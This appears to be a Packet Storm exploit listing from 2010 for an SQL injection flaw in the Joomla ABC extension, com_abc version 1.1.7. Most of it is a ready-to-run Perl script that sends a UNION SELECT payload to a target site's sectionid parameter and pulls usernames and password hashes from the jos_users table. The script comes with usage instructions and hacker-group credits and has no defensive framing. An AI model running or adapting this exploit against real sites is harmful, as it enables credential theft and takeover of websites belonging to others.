Joomla ABC 1.1.7 SQL Injection

2010-04-28T00:00:00
ID PACKETSTORM:89001
Type packetstorm
Reporter AntiSecurity
Modified 2010-04-28T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
#***********************************************************************#  
# #  
# [o] ABC Joomla Extension SQL Injection Exploit #  
# Software : com_abc version 1.1.7 #  
# Vendor : http://www.airiny.com/ #  
# Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #  
# Contact : public[at]antisecurity[dot]org #  
# Home : http://antisecurity.org/ #  
# #  
# [o] Usage #  
# root@evilc0de:~# perl abc.pl www.target.com #  
# #  
# [o] Greetz #  
# Angela Zhang stardustmemory aJe martfella pizzyroot Genex #  
# H312Y yooogy mousekill }^-^{ noname matthews wishnusakti #  
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 #  
# #  
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia #  
# #  
#***********************************************************************#  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
my $target = $ARGV[0];  
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid=';  
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';  
print "\n[x]===============================================[x]\n";  
print "[x] ABC Joomla Extension SQL Injection Exploit [x]\n";  
print "[x] [C]oded By AntiSecurity [x]\n";  
print "[x]===============================================[x]\n\n";  
  
my $exploit = "http://".$target.$file_vuln.$sql_query;  
  
my $request = HTTP::Request->new(GET=>$exploit);  
my $useragent = LWP::UserAgent->new();  
$useragent->timeout(10);  
my $response = $useragent->request($request);  
if ($response->is_success) {  
my $res = $response->content;  
if ($res =~ m/:(.*):(.*):/g) {  
my ($username,$password) = ($1,$2);  
print "[+] $username:$password \n\n";  
}  
else { print "[-] Error, Fail to get admin login.\n\n"; }  
}  
else { print "[-] Error, ".$response->status_line."\n\n"; }  
  
`